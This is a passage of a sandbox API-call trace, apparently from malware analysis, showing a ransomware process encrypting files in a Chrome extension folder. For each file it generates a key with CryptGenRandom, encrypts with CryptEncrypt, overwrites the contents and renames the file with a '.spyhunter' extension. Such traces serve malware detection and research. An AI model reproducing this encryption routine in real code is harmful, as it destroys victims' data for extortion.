Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.spyhunter") returned 165 [0133.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0133.825] GetProcessHeap () returned 0x2c0000 [0133.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.825] GetProcessHeap () returned 0x2c0000 [0133.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.825] GetProcessHeap () returned 0x2c0000 [0133.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e5e0 | out: hHeap=0x2c0000) returned 1 [0133.825] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f378 | out: pbBuffer=0x270f378) returned 1 [0133.825] GetProcessHeap () returned 0x2c0000 [0133.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.825] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f370*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f370*=0x30) returned 1 [0133.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0133.881] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0133.881] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0133.881] GetProcessHeap () returned 0x2c0000 [0133.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.881] ReadFile (in: hFile=0x188, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f334, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f334*=0xd2c, lpOverlapped=0x0) returned 1 [0133.886] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffff2d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.886] WriteFile (in: hFile=0x188, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd2c, lpNumberOfBytesWritten=0x270f334, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f334*=0xd2c, lpOverlapped=0x0) returned 1 [0133.886] GetProcessHeap () returned 0x2c0000 [0133.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.887] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.887] WriteFile (in: hFile=0x188, lpBuffer=0x270f374*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f334, lpOverlapped=0x0 | out: lpBuffer=0x270f374*, lpNumberOfBytesWritten=0x270f334*=0x4, lpOverlapped=0x0) returned 1 [0133.887] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f334, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f334*=0x30, lpOverlapped=0x0) returned 1 [0133.887] CloseHandle (hObject=0x188) returned 1 [0133.887] GetProcessHeap () returned 0x2c0000 [0133.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.887] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.spyhunter") returned 152 [0133.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.spyhunter")) returned 1 [0133.888] GetProcessHeap () returned 0x2c0000 [0133.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.888] GetProcessHeap () returned 0x2c0000 [0133.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.888] GetProcessHeap () returned 0x2c0000 [0133.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17c10 | out: hHeap=0x2c0000) returned 1 [0133.889] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f378 | out: pbBuffer=0x270f378) returned 1 [0133.889] GetProcessHeap () returned 0x2c0000 [0133.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f370*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f370*=0x30) returned 1 [0133.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0133.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0133.889] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.890] GetProcessHeap () returned 0x2c0000 [0133.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.890] ReadFile (in: hFile=0x188, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f334, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f334*=0xd9, lpOverlapped=0x0) returned 1 [0133.891] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.891] WriteFile (in: hFile=0x188, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x270f334, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f334*=0xd9, lpOverlapped=0x0) returned 1 [0133.891] GetProcessHeap () returned 0x2c0000 [0133.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.891] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.891] WriteFile (in: hFile=0x188, lpBuffer=0x270f374*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f334, lpOverlapped=0x0 | out: lpBuffer=0x270f374*, lpNumberOfBytesWritten=0x270f334*=0x4, lpOverlapped=0x0) returned 1 [0133.891] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f334, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f334*=0x30, lpOverlapped=0x0) returned 1 [0133.891] CloseHandle (hObject=0x188) returned 1 [0133.892] GetProcessHeap () returned 0x2c0000 [0133.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.892] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.spyhunter") returned 165 [0133.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0133.893] GetProcessHeap () returned 0x2c0000 [0133.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.893] GetProcessHeap () returned 0x2c0000 [0133.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.894] GetProcessHeap () returned 0x2c0000 [0133.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31dff0 | out: hHeap=0x2c0000) returned 1 [0133.895] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f370 | out: pbBuffer=0x270f370) returned 1 [0133.895] GetProcessHeap () returned 0x2c0000 [0133.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f368*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f368*=0x30) returned 1 [0133.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0133.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0133.896] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.896] GetProcessHeap () returned 0x2c0000 [0133.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.896] ReadFile (in: hFile=0x188, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f32c*=0xd6, lpOverlapped=0x0) returned 1 [0133.897] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.897] WriteFile (in: hFile=0x188, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x270f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f32c*=0xd6, lpOverlapped=0x0) returned 1 [0133.897] GetProcessHeap () returned 0x2c0000 [0133.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.897] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.897] WriteFile (in: hFile=0x188, lpBuffer=0x270f36c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f32c, lpOverlapped=0x0 | out: lpBuffer=0x270f36c*, lpNumberOfBytesWritten=0x270f32c*=0x4, lpOverlapped=0x0) returned 1 [0133.897] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f32c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f32c*=0x30, lpOverlapped=0x0) returned 1 [0133.898] CloseHandle (hObject=0x188) returned 1 [0133.898] GetProcessHeap () returned 0x2c0000 [0133.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.898] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.spyhunter") returned 165 [0133.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.spyhunter")) returned 1 [0133.899] GetProcessHeap () returned 0x2c0000 [0133.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.899] GetProcessHeap () returned 0x2c0000 [0133.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.899] GetProcessHeap () returned 0x2c0000 [0133.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ab80 | out: hHeap=0x2c0000) returned 1 [0133.900] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f368 | out: pbBuffer=0x270f368) returned 1 [0133.900] GetProcessHeap () returned 0x2c0000 [0133.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.900] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f360*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f360*=0x30) returned 1 [0133.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0133.901] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0133.901] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.901] GetProcessHeap () returned 0x2c0000 [0133.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.901] ReadFile (in: hFile=0x188, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f324, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f324*=0xea, lpOverlapped=0x0) returned 1 [0133.902] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.902] WriteFile (in: hFile=0x188, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x270f324, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f324*=0xea, lpOverlapped=0x0) returned 1 [0133.902] GetProcessHeap () returned 0x2c0000 [0133.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.902] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.903] WriteFile (in: hFile=0x188, lpBuffer=0x270f364*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f324, lpOverlapped=0x0 | out: lpBuffer=0x270f364*, lpNumberOfBytesWritten=0x270f324*=0x4, lpOverlapped=0x0) returned 1 [0133.903] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f324, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f324*=0x30, lpOverlapped=0x0) returned 1 [0133.903] CloseHandle (hObject=0x188) returned 1 [0133.903] GetProcessHeap () returned 0x2c0000 [0133.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.903] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.spyhunter") returned 165 [0133.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0133.904] GetProcessHeap () returned 0x2c0000 [0133.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.904] GetProcessHeap () returned 0x2c0000 [0133.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.904] GetProcessHeap () returned 0x2c0000 [0133.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17d80 | out: hHeap=0x2c0000) returned 1 [0134.151] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f350 | out: pbBuffer=0x270f350) returned 1 [0134.151] GetProcessHeap () returned 0x2c0000 [0134.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.151] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f348*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f348*=0x30) returned 1 [0134.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.152] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0134.152] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.152] GetProcessHeap () returned 0x2c0000 [0134.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.152] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f30c*=0xdd, lpOverlapped=0x0) returned 1 [0134.153] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.153] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x270f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f30c*=0xdd, lpOverlapped=0x0) returned 1 [0134.153] GetProcessHeap () returned 0x2c0000 [0134.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.153] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.153] WriteFile (in: hFile=0xec, lpBuffer=0x270f34c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f30c, lpOverlapped=0x0 | out: lpBuffer=0x270f34c*, lpNumberOfBytesWritten=0x270f30c*=0x4, lpOverlapped=0x0) returned 1 [0134.153] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f30c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f30c*=0x30, lpOverlapped=0x0) returned 1 [0134.154] CloseHandle (hObject=0xec) returned 1 [0134.154] GetProcessHeap () returned 0x2c0000 [0134.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.154] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.spyhunter") returned 165 [0134.154] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0134.154] GetProcessHeap () returned 0x2c0000 [0134.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.154] GetProcessHeap () returned 0x2c0000 [0134.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.155] GetProcessHeap () returned 0x2c0000 [0134.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0fc78 | out: hHeap=0x2c0000) returned 1 [0134.156] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f348 | out: pbBuffer=0x270f348) returned 1 [0134.156] GetProcessHeap () returned 0x2c0000 [0134.156] RtlAllocateHeap (HeapHandle=0x2c0000, 